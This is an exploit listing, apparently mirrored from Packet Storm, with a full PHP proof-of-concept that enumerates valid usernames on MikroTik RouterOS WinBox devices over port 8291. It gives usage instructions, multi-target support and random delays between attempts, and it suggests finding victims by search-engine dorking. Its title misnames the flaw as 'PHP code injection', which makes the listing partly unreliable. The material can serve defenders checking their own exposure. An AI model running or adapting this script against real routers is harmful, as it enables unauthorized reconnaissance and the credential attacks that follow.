📄 MikroTik RouterOS WinBox 3.41 Username Enumeration

🗓️ 06 Feb 2026 00:00:00Reported by indoushkaType
packetstorm🔗 packetstorm.news👁 159 Views
MikroTik RouterOS WinBox 3.41 PHP code injection enables username enumeration over port 8291.
=============================================================================================================================================
    | # Title     : MikroTik RouterOS WinBox 3.41 PHP Code Injection Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://mikrotik.com/download                                                                                               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:
        
    	This code torrents usernames on MikroTik RouterOS via port 8291 (Winbox specific port) using wordlist. 
    	Identification: Identification by length of probe whether the username is valid or not.
     
    [+] save code as poc.php .
    
    [+] USage : php poc.php  wordlist.txt 192.168.1.1,192.168.1.2
    
    [+] PayLoad :
    
    <?php
    
    // دالة قراءة قائمة الكلمات من الملف
    function read_wordlist($file_path) {
        $wordlist = [];
        try {
            $lines = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($lines !== false) {
                $wordlist = $lines;
            } else {
                echo "Error reading wordlist.\n";
            }
        } catch (Exception $e) {
            echo "Error reading wordlist: " . $e->getMessage() . "\n";
        }
        return $wordlist;
    }
    
    // دالة إنشاء الحمولة بناءً على اسم المستخدم
    function create_payload($base_payload, $username) {
        $length = strlen($username);
        $first_byte = chr(0x22 + $length);  // تعديل أول بايت في الحمولة
        return $first_byte . substr($base_payload, 1, 1) . $username . substr($base_payload, 2);
    }
    
    // دالة معالجة الاستجابة لتحديد صلاحية اسم المستخدم
    function process_response($response) {
        $response_length = strlen($response);
        if ($response_length == 51) {
            return "valid";
        } elseif ($response_length == 35) {
            return "invalid";
        } else {
            return "unknown";
        }
    }
    
    // دالة المسح عبر الأهداف باستخدام قائمة الكلمات
    function scan_target($host, $port, $wordlist, $base_payload) {
        echo "Scanning $host:$port...\n";
        $valid_usernames = [];
    
        foreach ($wordlist as $username) {
            $socket = @stream_socket_client("tcp://$host:$port", $errno, $errstr, 5);  // الاتصال بالخادم
            if (!$socket) {
                echo "Error connecting to $host:$port for username $username: $errstr ($errno)\n";
                continue;
            }
    
            $payload = create_payload($base_payload, $username);
            echo "Sending payload for username: $username\n";
            fwrite($socket, $payload);
            
            // انتظار الاستجابة من الخادم
            $response = fread($socket, 1024);
            $result = process_response($response);
            
            if ($result == "valid") {
                $valid_usernames[] = $username;
                echo "Valid username found: $username\n";
            } elseif ($result == "invalid") {
                echo "Invalid username: $username\n";
            }
            
            fclose($socket);
            // تأخير عشوائي بين المحاولات (بين 1 و 3 ثواني)
            sleep(rand(1, 3));
        }
    
        return $valid_usernames;
    }
    
    // الدالة الرئيسية لإدارة المسح عبر عدة أهداف
    function main($targets, $port, $wordlist_path) {
        $wordlist = read_wordlist($wordlist_path);
        if (empty($wordlist)) {
            echo "Wordlist is empty or could not be loaded.\n";
            return;
        }
    
        $base_payload = "\x22\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    
        foreach ($targets as $target) {
            $valid_usernames = scan_target($target, $port, $wordlist, $base_payload);
            echo "Results for $target: " . (empty($valid_usernames) ? "No valid usernames found" : implode(", ", $valid_usernames)) . "\n";
        }
    }
    
    // الجزء الذي يقوم بتنفيذ البرنامج من سطر الأوامر
    if ($argc < 3) {
        echo "Usage: php mikrotik_routeros_userenum_wordlist.php <wordlist_path> <target1,target2,...>\n";
        exit(1);
    }
    
    $wordlist_path = $argv[1];
    $targets = explode(",", $argv[2]);
    $port = 8291;
    
    main($targets, $port, $wordlist_path);
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
06 Feb 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3